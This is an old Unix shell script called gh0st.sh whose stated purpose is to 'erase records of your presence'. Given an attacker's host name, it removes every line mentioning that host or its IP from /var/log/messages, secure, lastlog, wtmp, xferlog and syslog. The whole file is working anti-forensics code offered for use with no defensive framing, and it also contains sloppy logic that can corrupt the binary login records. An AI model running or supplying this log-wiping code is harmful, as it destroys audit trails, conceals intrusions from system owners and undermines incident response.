#!/bin/sh
# gh0st.sh - by benz@slacknet.org [http://benz.slacknet.org]
# log parsing shell script to erase records of your presence

echo "gh0st.sh - by benz@slacknet.org [http://benz.slacknet.org]"
echo "----------------------------------------------------------"
if [ "$1" = "" ]; then
 echo "[gh0st]: usage -- $0 <your host>"
 exit 0
fi
g_ip=`host $1 | grep "has address" | awk '{print $4}'`
echo -n "[gh0st]: looking for /var/log.."
varlog="yes"
if [ ! -d /var/log ]; then
 varlog="no"
fi
echo " $varlog"
if [ "$varlog" != "yes" ]; then
 echo "[gh0st]: unable to access /var/log/messages.."
 exit 0
fi
varlogmessages="yes"
if [ ! -f /var/log/messages ]; then
 varlogmessages="no"
fi
echo " $varlogmessages"
if [ "$varlogmessages" = "yes" ]; then
 echo -n "[gh0st]: checking for your host in /var/log/messages.."
 cat /var/log/messages | grep $1 >/dev/null 2>&1
 if [ $? -eq 0 ]; then
  ip1="yes"
  echo " yes! (poof)" 
  cat /var/log/messages | grep -v $1 1>.msg.tmp 2>.msg.tmp
  mv .msg.tmp /var/log/messages
  touch /var/log/messages
 fi 
 if [ "$ip1" != "yes" ]; then
 echo " no."
 fi
 echo -n "[gh0st]: checking for your ip ($g_ip) in /var/log/messages.."
 cat /var/log/messages | grep "$g_ip" >/dev/null 2>&1
 if [ $? -eq 0 ]; then
  echo " yes!"
  ip2="yes"
  cat /var/log/messages | grep -v $g_ip 1>.msg.tmp 2>.msg.tmp
  mv .msg.tmp /var/log/messages 
  touch /var/log/messages
 fi
 if [ "$ip2" != "yes" ]; then
  echo " no."
 fi
fi
 
echo -n "[gh0st]: looking for /var/log/secure.."
varlogsecure="yes"
if [ ! -f /var/log/secure ]; then
 varlogsecure="no"
fi
echo " $varlogsecure"
if [ "$varlogsecure" = "yes" ]; then
 echo -n "[gh0st]: checking for your host in /var/log/secure.."
 cat /var/log/secure | grep $1 >/dev/null 2>&1
 if [ $? -eq 0 ]; then
  ip3="yes"
  echo " yes! (poof)"
  cat /var/log/secure | grep -v $1 1>.msg.tmp 2>.msg.tmp
  mv .msg.tmp /var/log/secure
  touch /var/log/secure
 fi
 if [ "$ip3" != "yes" ]; then
  echo " no."
 fi
 echo -n "[gh0st]: checking for your ip ($g_ip) in /var/log/secure.."
 cat /var/log/secure | grep "$g_ip" >/dev/null 2>&1
 if [ $? -eq 0 ]; then
  echo " yes!"
  ip4="yes"
  cat /var/log/secure | grep -v $g_ip 1>.msg.tmp 2>.msg.tmp
  mv .msg.tmp /var/log/secure
  touch /var/log/secure
 fi
 if [ "$ip4" != "yes" ]; then
  echo " no."
 fi
fi
echo -n "[gh0st]: looking for /var/log/lastlog.."
varloglast="yes"
if [ ! -f /var/log/lastlog ]; then
 varloglast="no"
fi
echo " $varloglast"
if [ "$varloglast" = "yes" ]; then
 echo -n "[gh0st]: checking for your host in /var/log/lastlog.."
 cat /var/log/lastlog | grep $1 >/dev/null 2>&1
 if [ $? -eq 0 ]; then
  ip5="yes"
  echo " yes! (poof)"
  cat /var/log/lastlog | grep -v $1 1>.msg.tmp 2>.msg.tmp
  mv .msg.tmp /var/log/lastlog
  touch /var/log/lastlog
 fi
 if [ "$ip5" != "yes" ]; then
  echo " no."
 fi
 echo -n "[gh0st]: checking for your ip ($g_ip) in /var/log/lastlog.."
 cat /var/log/lastlog | grep "$g_ip" >/dev/null 2>&1
 if [ $? -eq 0 ]; then
  echo " yes!"
  ip6="yes"
  cat /var/log/lastlog | grep -v $g_ip 1>.msg.tmp 2>.msg.tmp
  mv .msg.tmp /var/log/lastlog
  touch /var/log/lastlog
 fi
 if [ "$ip6" != "yes" ]; then
  echo " no."
 fi
fi
echo -n "[gh0st]: looking for /var/log/wtmp.."
varlogwtmp="yes"
if [ ! -f /var/log/wtmp ]; then
 varlogwtmp="no"
fi
echo " $varlogwtmp"
if [ "$varlogwtmp" = "yes" ]; then
 echo -n "[gh0st]: checking for your host in /var/log/wtmp.."
 cat /var/log/wtmp | grep $1 >/dev/null 2>&1
 if [ $? -eq 0 ]; then
  ip7="yes"
  echo " yes! (poof)"
  cat /var/log/wtmp | grep -v $1 1>.msg.tmp 2>.msg.tmp
  mv .msg.tmp /var/log/wtmp
  touch /var/log/wtmp
 fi
 if [ "$ip7" != "yes" ]; then
  echo " no."
 fi
 echo -n "[gh0st]: checking for your ip ($g_ip) in /var/log/wtmp.."
 cat /var/log/wtmp | grep "$g_ip" >/dev/null 2>&1
 if [ $? -eq 0 ]; then
  echo " yes!"
  ip8="yes"
  cat /var/log/wtmp | grep -v $g_ip 1>.msg.tmp 2>.msg.tmp
  mv .msg.tmp /var/log/wtmp
  touch /var/log/wtmp
 fi
 if [ "$ip7" != "yes" ]; then
  echo " no."
 fi
fi

echo -n "[gh0st]: looking for /var/log/xferlog.."
varlogxfer="yes"
if [ ! -f /var/log/xferlog ]; then
 varlogxfer="no"
fi
echo " $varlogxfer"
if [ "$varlogxfer" = "yes" ]; then 
 echo -n "[gh0st]: checking for your host in /var/log/xferlog.."
 cat /var/log/xferlog | grep $1 >/dev/null 2>&1
 if [ $? -eq 0 ]; then
  ip8="yes"
  echo " yes! (poof)"
  cat /var/log/xferlog | grep -v $1 1>.msg.tmp 2>.msg.tmp
  mv .msg.tmp /var/log/xferlog
  touch /var/log/xferlog
 fi
 if [ "$ip8" != "yes" ]; then
  echo " no."
 fi
 echo -n "[gh0st]: checking for your ip ($g_ip) in /var/log/xferlog.."
 cat /var/log/xferlog | grep "$g_ip" >/dev/null 2>&1
 if [ $? -eq 0 ]; then
  echo " yes!"
  ip9="yes"
  cat /var/log/xferlog | grep -v $g_ip 1>.msg.tmp 2>.msg.tmp
  mv .msg.tmp /var/log/xferlog
  touch /var/log/xferlog
 fi
 if [ "$ip9" != "yes" ]; then
  echo " no."
 fi
fi 

echo -n "[gh0st]: looking for /var/log/syslog.."
varlogsys="yes"
if [ ! -f /var/log/syslog ]; then
 varlogsys="no"
fi
echo " $varlogsys"
if [ "$varlogsys" = "yes" ]; then
 echo -n "[gh0st]: checking for your host in /var/log/syslog.."
 cat /var/log/syslog | grep $1 >/dev/null 2>&1
 if [ $? -eq 0 ]; then
  ip10="yes"
  echo " yes! (poof)"
  cat /var/log/syslog | grep -v $1 1>.msg.tmp 2>.msg.tmp
  mv .msg.tmp /var/log/syslog
  touch /var/log/syslog
 fi
 if [ "$ip10" != "yes" ]; then
  echo " no."
 fi
 echo -n "[gh0st]: checking for your ip ($g_ip) in /var/log/syslog.."
 cat /var/log/syslog | grep "$g_ip" >/dev/null 2>&1
 if [ $? -eq 0 ]; then
  echo " yes!"
  ip11="yes"
  cat /var/log/syslog | grep -v $g_ip 1>.msg.tmp 2>.msg.tmp
  mv .msg.tmp /var/log/syslog
  touch /var/log/syslog
 fi
 if [ "$ip11" != "yes" ]; then
  echo " no."
 fi
fi
echo "[gh0st]: parsing complete. eof"
exit 0